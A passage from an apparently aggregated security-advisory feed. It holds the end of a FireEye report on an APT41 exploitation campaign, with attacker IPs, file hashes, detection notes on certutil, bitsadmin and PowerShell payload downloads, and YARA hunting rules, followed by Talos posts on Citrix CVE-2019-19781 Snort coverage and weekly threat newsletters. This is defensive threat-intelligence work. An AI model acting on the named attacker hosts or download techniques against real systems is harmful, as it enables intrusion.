\n\n66.42.98[.]220\n\n91.208.184[.]78\n\n74.82.201[.]8\n\nexchange.dumb1[.]com\n\ninstall.bat (MD5: 7966c2c546b71e800397a67f942858d0)\n\nstoresyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f)\n\nC:\\Windows\\Temp\\storesyncsvc.dll\n\nC:\\Windows\\Temp\\install.bat\n\n2.exe (MD5: 3e856162c36b532925c8226b4ed3481c)\n\nC:\\Users\\\\[redacted]\\install.bat\n\nTzGG (MD5: 659bd19b562059f3f0cc978e15624fd9)\n\nC:\\ManageEngine\\DesktopCentral_Server\\jre\\bin\\java.exe spawning cmd.exe and/or bitsadmin.exe\n\nCertutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78\n\nPowerShell downloading files with Net.WebClient \n \n#### Detecting the Techniques\n\nFireEye detects this activity across our platforms. This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.\n\nPlatform\n\n| \n\nSignature Name \n \n---|--- \n \nEndpoint Security\n\n| \n\nBITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY)\n\nCERTUTIL.EXE DOWNLOADER A (UTILITY)\n\nGeneric.mg.5909983db4d9023e\n\nGeneric.mg.3e856162c36b5329\n\nPOWERSHELL DOWNLOADER (METHODOLOGY)\n\nSUSPICIOUS BITSADMIN USAGE B (METHODOLOGY)\n\nSAMWELL (BACKDOOR)\n\nSUSPICIOUS CODE EXECUTION FROM ZOHO MANAGE ENGINE (EXPLOIT) \n \nNetwork Security\n\n| \n\nBackdoor.Meterpreter\n\nDTI.Callback\n\nExploit.CitrixNetScaler\n\nTrojan.METASTAGE\n\nExploit.ZohoManageEngine.CVE-2020-10198.Pwner\n\nExploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader \n \nHelix\n\n| \n\nCITRIX ADC [Suspicious Commands] \nEXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt] \nEXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success] \nEXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access] \nEXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning] \nMALWARE METHODOLOGY [Certutil User-Agent] \nWINDOWS METHODOLOGY [BITSadmin Transfer] \nWINDOWS METHODOLOGY [Certutil Downloader] \n \n#### MITRE ATT&amp;CK Technique Mapping\n\nATT&amp;CK\n\n| \n\nTechniques \n \n---|--- \n \nInitial Access\n\n| \n\nExternal Remote Services (T1133), Exploit Public-Facing Application (T1190) \n \nExecution\n\n| \n\nPowerShell (T1086), Scripting (T1064) \n \nPersistence\n\n| \n\nNew Service (T1050) \n \nPrivilege Escalation\n\n| \n\nExploitation for Privilege Escalation (T1068) \n \nDefense Evasion\n\n| \n\nBITS Jobs (T1197), Process Injection (T1055) \n \nCommand And Control\n\n| \n\nRemote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071) \n \n#### Appendix A: Discovery Rules\n\nThe following Yara rules serve as examples of discovery rules for APT41 actor TTPs, turning the adversary methods or tradecraft into new haystacks for purposes of detection or hunting. For all tradecraft-based discovery rules, we recommend deliberate testing and tuning prior to implementation in any production system. Some of these rules are tailored to build concise haystacks that are easy to review for high-fidelity detections. Some of these rules are broad in aperture that build larger haystacks for further automation or processing in threat hunting systems.\n\nimport \"pe\"\n\nrule ExportEngine_APT41_Loader_String\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription \"This looks for a common APT41 Export DLL name in BEACON shellcode loaders, such as loader_X86_svchost.dll\"\n\nstrings:\n\n$pcre = /loader_[\\x00-\\x7F]{1,}\\x00/\n\ncondition:\n\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))\n\n}\n\nrule ExportEngine_ShortName\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"This looks for Win PEs where Export DLL name is a single character\"\n\nstrings:\n\n$pcre = /[A-Za-z0-9]{1}\\\\.(dll|exe|dat|bin|sys)/\n\ncondition:\n\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))\n\n}\n\nrule ExportEngine_xArch\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"This looks for Win PEs where Export DLL name is a something like x32.dat\"\n\nstrings:\n\n$pcre = /[\\x00-\\x7F]{1,}x(32|64|86)\\\\.dat\\x00/\n\ncondition:\n\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))\n\n}\n\nrule RareEquities_LibTomCrypt\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"This looks for executables with strings from LibTomCrypt as seen by some APT41-esque actors https://github.com/libtom/libtomcrypt - might catch everything BEACON as well. You may want to exclude Golang and UPX packed samples.\"\n\nstrings:\n\n$a1 = \"LibTomMath\"\n\ncondition:\n\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $a1\n\n}\n\nrule RareEquities_KCP\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"This is a wide catchall rule looking for executables with equities for a transport library called KCP, https://github.com/skywind3000/kcp Matches on this rule may have built-in KCP transport ability.\"\n\nstrings:\n\n$a01 = \"[RO] %ld bytes\"\n\n$a02 = \"recv sn=%lu\"\n\n$a03 = \"[RI] %d bytes\"\n\n$a04 = \"input ack: sn=%lu rtt=%ld rto=%ld\"\n\n$a05 = \"input psh: sn=%lu ts=%lu\"\n\n$a06 = \"input probe\"\n\n$a07 = \"input wins: %lu\"\n\n$a08 = \"rcv_nxt=%lu\\\\\\n\"\n\n$a09 = \"snd(buf=%d, queue=%d)\\\\\\n\"\n\n$a10 = \"rcv(buf=%d, queue=%d)\\\\\\n\"\n\n$a11 = \"rcvbuf\"\n\ncondition:\n\n(uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize &lt; 5MB and 3 of ($a*)\n\n}\n\nrule ConventionEngine_Term_Users\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"Searching for PE files with PDB path keywords, terms or anomalies.\"\n\nsample_md5 = \"09e4e6fa85b802c46bc121fcaecc5666\"\n\nref_blog = \"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html\"\n\nstrings:\n\n$pcre = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\\\\\[\\x00-\\xFF]{0,200}Users[\\x00-\\xFF]{0,200}\\\\.pdb\\x00/ nocase ascii\n\ncondition:\n\n(uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre\n\n}\n\nrule ConventionEngine_Term_Desktop\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"Searching for PE files with PDB path keywords, terms or anomalies.\"\n\nsample_md5 = \"71cdba3859ca8bd03c1e996a790c04f9\"\n\nref_blog = \"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html\"\n\nstrings:\n\n$pcre = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\\\\\[\\x00-\\xFF]{0,200}Desktop[\\x00-\\xFF]{0,200}\\\\.pdb\\x00/ nocase ascii\n\ncondition:\n\n(uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre\n\n}\n\nrule ConventionEngine_Anomaly_MultiPDB_Double\n\n{\n\nmeta:\n\nauthor = \"@stvemillertime\"\n\ndescription = \"Searching for PE files with PDB path keywords, terms or anomalies.\"\n\nsample_md5 = \"013f3bde3f1022b6cf3f2e541d19353c\"\n\nref_blog = \"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html\"\n\nstrings:\n\n$pcre = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\\\\\[\\x00-\\xFF]{0,200}\\\\.pdb\\x00/\n\ncondition:\n\n(uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #pcre == 2\n\n} \n \n---\n", "modified": "2020-03-25T12:00:00", "published": "2020-03-25T12:00:00", "id": "FIREEYE:BFB36D22F20651C632D25AA20588E904", "href": "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", "type": "fireeye", "title": "This Is\u00a0Not a Test: APT41 Initiates Global Intrusion Campaign Using\nMultiple Exploits", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2020-01-15T21:25:49", "bulletinFamily": "blog", "cvelist": ["CVE-2019-19781"], "description": "[](<https://1.bp.blogspot.com/-VTnYmwu8m3c/Xhy-eerp0iI/AAAAAAAABag/IaZw8HUa2sMUAmJgZvkCC7JrtedOpg9AACLcBGAsYHQ/s1600/image1.png>)\n\n_By [Edmund Brumaghin](<https://www.blogger.com/profile/10442669663667294759>), with contributions from Dalton Schaadt. _ \n \n\n\n## Executive Summary\n\n \nRecently, the details of a critical vulnerability affecting Citrix Application Delivery Controller and Citrix Gateway servers were publicly disclosed. This vulnerability is currently being tracked using [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>). A public patch has not yet been released, however, Citrix has [released](<https://support.citrix.com/article/CTX267679>) recommendations for steps that affected organizations can take to help mitigate the risk associated with this vulnerability. Successful exploitation of CVE-2019-19781 could allow a remote attacker to execute arbitrary code on affected systems. \n \nThis vulnerability, which is a directory traversal vulnerability, affects multiple [versions](<https://support.citrix.com/article/CTX267027>) of these products. Since the public disclosure of this vulnerability, several proof-of-concept (PoC) tools have been publicly released that can be used by adversaries to scan for vulnerable systems and attempt to exploit the vulnerable condition to achieve remote code execution. There have been multiple public reports of mass-scanning and exploitation activity already being observed in the wild. As such, it is important that organizations are aware of this vulnerability and take steps to ensure that they mitigate the risk of attacks against their environment. \n \n\n\n## Talos coverage for CVE-2019-19781\n\n \nTalos has developed and released coverage for this vulnerability in the form of [Snort](<https://www.snort.org/products>) and [Firepower](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>) signatures. These signatures have been available since Dec. 24, 2019 and can be leveraged by organizations to protect their affected systems from possible exploitation attempts until an official patch is publicly released. \n \n**Snort SIDs:** 52512, 52513, 52603 \n \n", "modified": "2020-01-15T11:41:36", "published": "2020-01-15T11:41:36", "id": "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uCR7T0fZRUs/snort-rules-cve-2019-19781.html", "type": "talosblog", "title": "New Snort rules protect against recently discovered Citrix vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-30T19:31:49", "bulletinFamily": "blog", "cvelist": ["CVE-2019-19781"], "description": "[](<http://4.bp.blogspot.com/-YLRBgfX54uk/XKYbVrHlGXI/AAAAAAAAFu8/MxjUEd-3hhQTW4tZkat-cLDi8G5tVm6bgCK4BGAYYCw/s1600/threat-source.png>) \n_Newsletter compiled by Jon Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nBe sure to pay close attention Tuesday for [some changes we have coming to Snort.org](<https://blog.snort.org/2020/01/area-under-construction-snort.html>). We\u2019ll spare you the details for now, but please bear with us if the search function isn\u2019t working correctly for you or you see anything else wonky on the site. \n \nAnd, as always, we have the [latest Threat Roundup](<https://blog.talosintelligence.com/2020/01/threat-roundup-0117-0124.html>) where we go through the top threats we saw \u2014 and blocked \u2014 over the past week. \n\n\n### Upcoming public engagements\n\n**Event: **A World of Threats: When DNS becomes the new weapon for governments at [Swiss Cyber Security Days](<https://swisscybersecuritydays.ch/en/programme-en/>)** ** \n**Location: **Forum Fribourg, Granges-Paccot, Switzerland \n**Date: **Feb. 12 - 13 \n**Speakers: **Paul Rascagn\u00e8res \n**Synopsis: **In this presentation, Paul will present two threat actors Cisco Talos has been tracking who are manipulating the DNS system. On Jan. 22, 2019, the U.S. DHS published a directive concerning this attack vector. We will present the timeline for these events and their technical details. One of the actors is behind the campaign we named \u201cSea Turtle.\u201d This actor is more advanced and more aggressive than others we\u2019ve observed in the past. They do not hesitate to directly target registrars and one registry. The talk will break down these two actors and the methodology used to target the victims. \n \n\n\n### Cyber Security Week in Review\n\n * State-sponsored actors linked to Turkey are believed to be [behind a recent wave of cyber attacks](<https://www.reuters.com/article/us-cyber-attack-hijack-exclusive/exclusive-hackers-acting-in-turkeys-interests-believed-to-be-behind-recent-cyberattacks-sources-idUSKBN1ZQ10X>) targeting governments in the Middle East and Asia. The attackers are using a technique called DNS hijacking that shows similarities to the Sea Turtle actor Cisco Talos discovered last year. \n * Facebook executives backed the security of its WhatsApp messaging software, saying it [could not have been at fault](<https://www.inc.com/jason-aten/facebook-says-apple-is-to-blame-for-hacking-of-jeff-bezos-phone.html>) for the hacking of Amazon CEO Jeff Bezos\u2019 phone. Reports state Bezos was sent a malicious video through WhatsApp and opened it, leading to the installation of spyware. However, Facebook laid the blame at the feet of Apple and iOS\u2019 security. \n * The Bezos incident has led to many wealthy individuals reaching out to cyber security vendors for [private assistance with security](<https://www.ft.com/content/96c79040-40ea-11ea-bdb5-169ba7be433d>). For example, one group is working on an information-sharing platform for cyber attacks targeting members of royal families across the globe. \n * Dozens of United Nations servers and user accounts were [breached during an August cyber attack](<https://www.thenewhumanitarian.org/investigation/2020/01/29/united-nations-cyber-attack>), according to new leaked reports. Staff members working in the UN\u2019s Geneva, Switzerland office were reportedly told to change their passwords but were not made aware of the breach. \n * The Japanese government [adopted a series of new policies](<https://www.infosecurity-magazine.com/news/japan-considers-emergency/>) this week designed to protect government services from a cyber attack during the upcoming Summer Olympics. A special panel called on infrastructure and public transportation services to investigate any potential vulnerabilities in their systems due to the use of internet-of-things devices, and report those flaws immediately to an administrator. \n * Cisco [launched a new security architecture platform for IoT devices](<https://securityboulevard.com/2020/01/cisco-launches-iot-security-platform/>) this week. Cisco Cyber Vision provides users with software and services backed by Talos\u2019 intelligence to identify threats and vulnerabilities in IoT assets in real-time. \n * Facebook [agreed to pay $550 million](<https://techcrunch.com/2020/01/29/facebook-will-pay-550-million-to-settle-class-action-lawsuit-over-privacy-violations/>) as part of a settlement of a class-action lawsuit in Illinois. The suit alleged Facebook violated a state law by using facial recognition technology to auto-tag users in photos without obtaining their consent. \n * The actor behind the Maze ransomware [dumped a large amount of victim data online](<https://arstechnica.com/information-technology/2020/01/dozens-of-companies-have-data-dumped-online-by-ransomware-ring-seeking-leverage/>) this week, including information from an Ohio community college and a grocery store chain in Michigan. Administrators of Maze\u2019s website said in a message that they were sparing recent victim Parkland, Florida, but still leaked some data to prove that they were hacked. \n * The [latest security update to iOS](<https://threatpost.com/apple-patches-ios-device-tracking/152364/>) allows users to disable a location-tracking feature used by many apps. The latest patches also fixed a critical remote code execution vulnerability in the WebKit browsing engine. \n\n \n\n\n### Notable recent security issues\n\n**Title: **[Cisco urging users to update Firepower Management Center immediately to fix severe bug](<https://www.zdnet.com/article/cisco-patch-this-critical-firewall-bug-in-firepower-management-center/>) \n**Description: **Cisco disclosed a high-severity vulnerability in its Firepower Management Center last week that could allow an attacker to bypass the usual authentication steps. The vulnerability \u2014 which was assigned a 9.8 severity score out of 10 \u2014 exists in the way Firepower handles LDAP authentication responses from an external authentication server. An attacker could exploit this flaw by sending a specially crafted HTTP request to the device. Users are also encouraged to turn off LDAP configuration on their devices. Cisco also disclosed seven high-severity flaws and 19 medium-severity security issues in some of its other products, including Smart Software Manager. \n**Snort SIDs: **52627 \u2013 52632, 52641 - 52646 \n** \n****Title: **[Exploitation of Citrix vulnerability spikes after POC released, patches followed](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \n**Description: **Citrix rushed out a patch for its Application Delivery Controller (ADC) and Citrix Gateway products after proof of concept code leaked for a major vulnerability. The company first disclosed CVE-2019-19781 in December, saying a patch was forthcoming. But security researchers have noticed an uptick in exploitation attacks, forcing Citrix to move up its timeline. \n**Snort SIDs: **52620 \n\n\n### Most prevalent malware files this week\n\n**SHA 256:** [85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5](<https://www.virustotal.com/gui/file/85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5/details>) \n**MD5: **8c80dd97c37525927c1e549cb59bcbf3 \n**Typical Filename:** eternalblue-2.2.0.exe \n**Claimed Product: **N/A \n**Detection Name: **W32.85B936960F.5A5226262.auto.Talos \n \n**SHA 256: **[3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3](<https://www.virustotal.com/gui/file/3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3/details>) \n**MD5: **47b97de62ae8b2b927542aa5d7f3c858 \n**Typical Filename: **qmreportupload.exe \n**Claimed Product:** qmreportupload \n**Detection Name: **Win.Trojan.Generic::in10.talos \n \n**SHA 256: **[c0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94** **](<https://www.virustotal.com/gui/file/c0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94/details>) \n**MD5: **7c38a43d2ed9af80932749f6e80fea6f \n**Typical Filename: **xme64-520.exe \n**Claimed Product: **N/A** ** \n**Detection Name: **PUA.Win.File.Coinminer::1201 \n \n**SHA 256: **[c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f](<https://www.virustotal.com/gui/file/c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f/details>) \n**MD5:** e2ea315d9a83e7577053f52c974f6a5a \n**Typical Filename: **c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f \n**Claimed Product: **N/A \n**Detection Name:** W32.AgentWDCR:Gen.21gn.1201 \n** \n****SHA 256: **[d91abcd024d4172fadc5aa82750a18796a549207b76f624b8a9d165459379258](<https://www.virustotal.com/gui/file/d91abcd024d4172fadc5aa82750a18796a549207b76f624b8a9d165459379258/details>)** ** \n**MD5:** a917d39a8ef125300f2f38ff1d1ab0db \n**Typical Filename: **FFChromeSetters \n**Claimed Product: **N/A \n**Detection Name: **PUA.Osx.Adware.Macsearch::agent.tht.talos \n \nKeep up with all things Talos by following us on [Twitter](<https://twitter.com/talossecurity?lang=en>). [Snort](<https://twitter.com/snort?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>), [ClamAV](<https://twitter.com/clamav?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) and [Immunet](<https://twitter.com/immunet?lang=en>) also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast [here](<https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410>) (as well as on your favorite podcast app). And, if you\u2019re not already, you can also subscribe to the weekly Threat Source newsletter [here](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>). \n\n", "modified": "2020-01-30T11:00:12", "published": "2020-01-30T11:00:12", "id": "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/VpsmXEgBYno/threat-source-newsletter-jan-30-2020.html", "type": "talosblog", "title": "Threat Source newsletter (Jan. 30, 2020)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-23T17:32:42", "bulletinFamily": "blog", "cvelist": ["CVE-2019-19781", "CVE-2020-0601"], "description": "[](<http://4.bp.blogspot.com/-YLRBgfX54uk/XKYbVrHlGXI/AAAAAAAAFu8/MxjUEd-3hhQTW4tZkat-cLDi8G5tVm6bgCK4BGAYYCw/s1600/threat-source.png>) \n_Newsletter compiled by Jon Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nThis wasn\u2019t your average Patch Tuesday. Microsoft\u2019s monthly security update was notable for a few reasons. For starters, it\u2019s really time to give up Windows 7, since this is the last free update Microsoft will issue for the operating system. \n \nThere was also a vulnerability that made headlines for leaving Windows open to cryptographic spoofing, which could allow an attacker to sign a malicious file as if it came from a trusted source. The bug was so severe that Microsoft even reached out to the U.S. military ahead of time to issue them an early patch. For more on Patch Tuesday, you can check out our roundup [here](<https://blog.talosintelligence.com/2020/01/microsoft-patch-tuesday-jan-2020.html>) and our Snort rule release [here](<https://blog.snort.org/2020/01/snort-rule-update-for-jan-14-2020.html>). \n \nElsewhere in the vulnerability department, we also released new Snort rules to [protect users against some notable Citrix bugs](<https://blog.talosintelligence.com/2020/01/snort-rules-cve-2019-19781.html>) that have been used in the wild. \n \nAnd, as always, we have the [latest Threat Roundup](<https://blog.talosintelligence.com/2020/01/threat-roundup-0103-0110.html>) where we go through the top threats we saw \u2014 and blocked \u2014 over the past week. \n\n\n### Upcoming public engagements\n\n**Event: **Talos Insights: The State of Cyber Security at Cisco Live Barcelona \n**Location: **Fira Barcelona, Barcelona, Spain \n**Date:** Jan. 27 - 31 \n**Speakers: **Warren Mercer \n**Synopsis: **Cisco Talos specializes in early-warning intelligence and threat analysis necessary for maintaining a secure network. We are responsible for defending networks realize that the security threat landscape is constantly in flux as attackers evolve their skills. Talos advances the overall efficacy of all Cisco security platforms by aggregating data, cooperating with teams of security experts, and applying the cutting-edge big data technology to security. In this talk, we will perform a deep analysis of recent threats and see how Talos leverages large datasets to deliver product improvements and mitigation strategies. \n \n\n\n### Cyber Security Week in Review\n\n * Apple once again [denied the FBI\u2019s request](<https://threatpost.com/apple-denies-fbi-request-to-unlock-shooters-iphone-again/151797/>) for the company to unlock an iPhone belonging to someone involved in a criminal investigation. The agency is attempting to access a device belonging to a man who shot and killed multiple people at a naval base last year. \n * This caused U.S. President Donald Trump to enter the fold. [Trump tweeted](<https://www.bbc.com/news/business-51115645>) that he was unhappy with Apple denying law enforcement access to devices \"used by killers, drug dealers and other violent criminal elements.\u201d \n * More than two weeks after a ransomware attack, foreign currency exchange service Travelex is [finally resuming normal operations](<https://www.zdnet.com/article/two-weeks-after-ransomware-attack-travelex-says-some-systems-are-now-back-online/>). The company recently said it was making \u201cgood progress\u201d on recovery and was expecting customer-facing systems to return soon. \n * The Travelex attack [prompted the U.S. government to release a new warning](<https://www.forbes.com/sites/daveywinder/2020/01/13/us-government-critical-security-alert-upgrade-vpn-or-expect-continued-cyber-attacks/#182cb2f16f70>) that users need to update their VPN services as soon as possible. Vulnerabilities disclosed last year in Pulse Secure VPN leave users open to cyber attacks similar to the ransomware infection on Travelex, according to the U.S. Cybersecurity and Infrastructure Security Agency. \n * The Democratic party in Iowa says it will still use a mobile app to [report primary election results](<https://www.npr.org/2020/01/14/795906732/despite-election-security-fears-iowa-caucuses-will-use-new-smartphone-app>), despite warnings that it is a security risk. Election judges will use the apps to count polling results during the presidential primaries and report those results on their mobile devices, though officials say there will be paper backups to verify the results. \n * The estimated cost of a recent cyber attack on the city of New Orleans is [above $7 million](<https://www.fox8live.com/2020/01/15/city-new-orleans-says-it-will-take-months-recover-recent-cyber-attack/>), $3 million of which the city says it will recoup from its cyber insurance policy. Officials say it will still take months to rebuild their internal network, and departments are still digging out from having to manually carry out many functions for weeks. \n * The U.S. election security czar warned that attempts to interfere in the U.S.\u2019 upcoming presidential election will be [more sophisticated than ever](<https://www.nbcnews.com/politics/national-security/u-s-election-czar-says-attempts-hack-2020-election-will-n1115346>). Shelby Pierson said at a recent presentation America is tracking several hacking groups, including a recent effort uncovered to breach a Ukrainian company at the center of President Donald Trump\u2019s impeachment trial. \n * A critical [vulnerability in a popular WordPress plugin](<https://www.bleepingcomputer.com/news/security/critical-wordpress-plugin-bug-allows-admin-logins-without-password/>) leaves more than 300,000 sites open to attack. An attacker could exploit a bug in InfiniteWP to log in as an administrator on any affected site. \n * Android devices infected with the Faketoken malware began [sending offensive SMS messages](<https://www.kaspersky.com/blog/faketoken-trojan-sends-offensive-sms/32048/>) last week. It sends these messages to foreign numbers, potentially costing the victim money based on their carrier\u2019s policies. \n * The U.S. may invest more than $1 billion into [researching alternatives for 5G](<https://arstechnica.com/tech-policy/2020/01/us-may-subsidize-huawei-alternatives-with-proposed-1-25-billion-fund/>) to avoid working with Chinese tech companies Huawei and ZTE. Legislation submitted in the Senate urged America to counter the Chinese government\u2019s investment in the telecom space.\n\n### Notable recent security issues\n\n**Title: **[Microsoft patches 49 vulnerabilities as part of Patch Tuesday](<https://www.pcworld.com/article/3514172/microsoft-nsa-confirm-killer-windows-10-bug-but-a-patch-is-available.html>) \n**Description: **Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. Patch Tuesday covers 49 vulnerabilities, eight of which are considered critical. This month's security update is particularly important for its disclosure of two vulnerabilities related to a core cryptographic component in all versions of Windows. CVE-2020-0601 could allow an attacker to use cryptography to sign a malicious executable, making the file appear as if it was from a trusted source. The victim would have no way of knowing if the file was malicious. Cyber security reporter Brian Krebs says the vulnerability is so serious, Microsoft secretly deployed a patch to branches of the U.S. military prior to today. \n**Snort SIDs: **52593 - 51596, 52604, 52605 \n \n**Title: **[ZeroCleare wiper malware deployed on oil refinery ](<https://www.zdnet.com/article/new-iranian-data-wiper-malware-hits-bapco-bahrains-national-oil-company/>) \n**Description: **ZeroCleare, a wiper malware connected to an Iranian hacker group, was recently deployed against a national oil refinery in Bahrain. An upgraded version has been spotted in the wild, according to security researchers, which can delete files off infected machines. The latest attacks match previous attacks using this malware family, which have gone after other targets connected to Saudi Arabia. Concerns over Iranian cyber attacks have spiked since the U.S. killed a high-profile Iranian general in a drone strike. \n**Snort SIDs: **52572 \u2013 52581 \n\n\n### Most prevalent malware files this week\n\n**SHA 256: **[1c3ed460a7f78a43bab0ae575056d00c629f35cf7e72443b4e874ede0f305871](<https://www.virustotal.com/gui/file/1c3ed460a7f78a43bab0ae575056d00c629f35cf7e72443b4e874ede0f305871/details>) \n**MD5: **c2406fc0fce67ae79e625013325e2a68 \n**Typical Filename: **SegurazoIC.exe \n**Claimed Product: **Digital Communications Inc. \n**Detection Name: **PUA.Win.Adware.Ursu::95.sbx.tg \n** \n****SHA 256: **[d73ea76f6f07f96b337335213418b58e3fbc7e4b519fec0ef3fbd19c1d335d81](<https://www.virustotal.com/gui/file/d73ea76f6f07f96b337335213418b58e3fbc7e4b519fec0ef3fbd19c1d335d81/details>)** ** \n**MD5: **5142c721e7182065b299951a54d4fe80 \n**Typical Filename: **FlashHelperServices.exe \n**Claimed Product: **Flash Helper Service \n**Detection Name: **PUA.Win.Adware.Flashserv::1201 \n \n**SHA 256:** [c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f](<https://www.virustotal.com/gui/file/c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f/details>)** ** \n**MD5: **e2ea315d9a83e7577053f52c974f6a5a \n**Typical Filename: **c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f.bin** ** \n**Claimed Product: **N/A \n**Detection Name: **W32.AgentWDCR:Gen.21gn.1201 \n** \n****SHA 256: **[15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b](<https://www.virustotal.com/gui/file/15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b/details>) \n**MD5: **799b30f47060ca05d80ece53866e01cc \n**Typical Filename: **mf2016341595.exe \n**Claimed Product: **N/A \n**Detection Name: **W32.Generic:Gen.22fz.1201 \n** \n****SHA 256: **[da231330efd623bc7d116ed233828be88951b9df7cc889e747d31279bdf2c2a0 ](<https://www.virustotal.com/gui/file/da231330efd623bc7d116ed233828be88951b9df7cc889e747d31279bdf2c2a0/details>) \n**MD5: **4a4ee4ce27fa4525be327967b8969e13 \n**Typical Filename: **4a4ee4ce27fa4525be327967b8969e13.exe \n**Claimed Product:** N/A \n**Detection Name: **PUA.Win.File.Coinminer::tpd \n \nKeep up with all things Talos by following us on [Twitter](<https://twitter.com/talossecurity?lang=en>). [Snort](<https://twitter.com/snort?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>), [ClamAV](<https://twitter.com/clamav?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) and [Immunet](<https://twitter.com/immunet?lang=en>) also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast [here](<https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410>) (as well as on your favorite podcast app). And, if you\u2019re not already, you can also subscribe to the weekly Threat Source newsletter [here](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>). \n\n", "modified": "2020-01-23T07:27:43", "published": "2020-01-23T07:27:43", "id": "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/2OjR0NsavV0/threat-source-newsletter-jan-26-2019.html", "type": "talosblog", "title": "Threat Source newsletter (Jan. 16, 2019)", "cvss": {"score": 7.5, "vector": 